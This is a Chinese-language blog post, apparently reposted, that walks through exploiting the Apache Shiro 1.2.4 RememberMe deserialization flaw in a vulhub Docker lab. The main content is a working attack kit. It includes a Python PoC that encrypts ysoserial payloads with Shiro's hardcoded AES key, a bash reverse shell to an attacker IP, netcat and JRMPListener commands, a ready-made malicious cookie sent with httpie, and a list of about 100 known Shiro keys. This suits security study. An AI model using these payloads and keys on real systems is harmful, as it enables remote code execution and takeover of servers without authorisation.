码迷,mamicode.com
首页 > 其他好文 > 详细

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

时间:2020-05-04 17:14:06      阅读:299      评论:0      收藏:0      [点我收藏+]

标签:序列化   dvb   manager   crypto   jackson   默认   gae   rhn   mon   

0x00 影响版本

Apache Shiro <= 1.2.4

0x01 产生原因

shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:
得到rememberMe的cookie值-->Base64解码-->AES解密-->反序列化
然而AES的密钥是硬编码的,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。
payload 构造
前16字节的密钥-->后面加入序列化参数-->AES加密-->base64编码-->发送cookie

0x02 靶场环境

docker pull vulhub/shiro

技术图片

然后打开127.0.0.1:8080
技术图片

0x03 漏洞复现

POC:

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen([‘java‘, ‘-jar‘, ‘ysoserial-0.0.6-SNAPSHOT-all.jar‘, ‘JRMPClient‘, command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext


if __name__ == ‘__main__‘:
    payload = encode_rememberme(sys.argv[1])    
print "rememberMe={0}".format(payload.decode())

攻击机上执行脚本生成恶意cookie

python shiro_shell.py 1.1.1.1:1099     #1.1.1.1为你的攻击机ip  端口可以随意变动,但是后面监听的时候也要做相应变动

生成的cookie类似下图
技术图片

反弹shell制作
反弹shell需要加密,网址:http://www.jackson-t.ca/runtime-exec-payloads.html
反弹shell代码如下

bash -i >& /dev/tcp/1.1.1.1/7878 0>&1             #1.1.1.1为攻击机ip

攻击机监听端口
攻击机1.1.1.1上打开两个窗口,
其中一个窗口监听shell

nc -lvp 7878

另一个窗口监听JRMP端口

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 ‘加密后的反弹shell‘

将生成的恶意cookie通过httpie发送
在攻击机1.1.1.1上执行如下代码

http 1.1.1.2:8080/login ‘Cookie:rememberMe=UfsKYXK1SIOgFdnOxdPidh09yGZv6Medaj/T0E5sE9xhxMP69kzlNKsEdfHUhTgD12ea7NOv+xRhnZSGhUi9rz1tYVPu5QHfINrMS4I+lTe82RO5PY1vJrmMwP/NnBvjfGtTWTwRSNl1AhNgJrAhrEBStf+cpnBMwmoWxiexDjm2BavY/lSLe52hZhCEcr0zv/kqC9PdhBfY326+ux/RkE0pfwfZNMEUrPIZw8gBJkCIDTb1qj+W32+YinOKCkye/i+GmKHifPoMSt91q0nR/NQnxyu4UJQoULSbCI3/vXKtGm7P+YNqhH6smVPIoTxqtAqWTJG7eOafDPC2azUlhbLcmjql7qDL2wPpv4JOxB0fLIwdkQqSn9DCBty2BfKDqf8I/lvTbKqHHfVIUMdjYQ==‘

查看攻击机上监听的结果
发现两个端口都会收到消息

技术图片
shell反弹到7878端口

技术图片

常用的100个key

kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAA==
fCq+/xW488hMTCD+cmJ3aQ==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
1QWLxg+NYmxraMoxAXu/Iw==
25BsmdYwjnfcWmnhAciDDg==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
3JvYhmBLUs0ETA5Kprsdag==
r0e3c16IdVkouZgk1TKVMg==
5aaC5qKm5oqA5pyvAAAAAA==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag==
6NfXkC7YVCV5DASIrEm1Rg==
6ZmI6I2j5Y+R5aSn5ZOlAA==
cmVtZW1iZXJNZQAAAAAAAA==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag==
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAA==
aU1pcmFjbGVpTWlyYWNsZQ==
bWljcm9zAAAAAAAAAAAAAA==
bWluZS1hc3NldC1rZXk6QQ==
bXRvbnMAAAAAAAAAAAAAAA==
ZUdsaGJuSmxibVI2ZHc9PQ==
wGiHplamyXlVB11UXWol8g==
U3ByaW5nQmxhZGUAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
L7RioUULEFhRyxM7a2R/Yg==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
OY//C4rhfwNxCQAQCrQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg==
ZWvohmPdUsAWT3=KpPqda
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAA==
2cVtiE83c4lIrELJwKGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAA==
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUS0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAA==
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA==
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==

Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现

标签:序列化   dvb   manager   crypto   jackson   默认   gae   rhn   mon   

原文地址:https://www.cnblogs.com/nul1/p/12827021.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!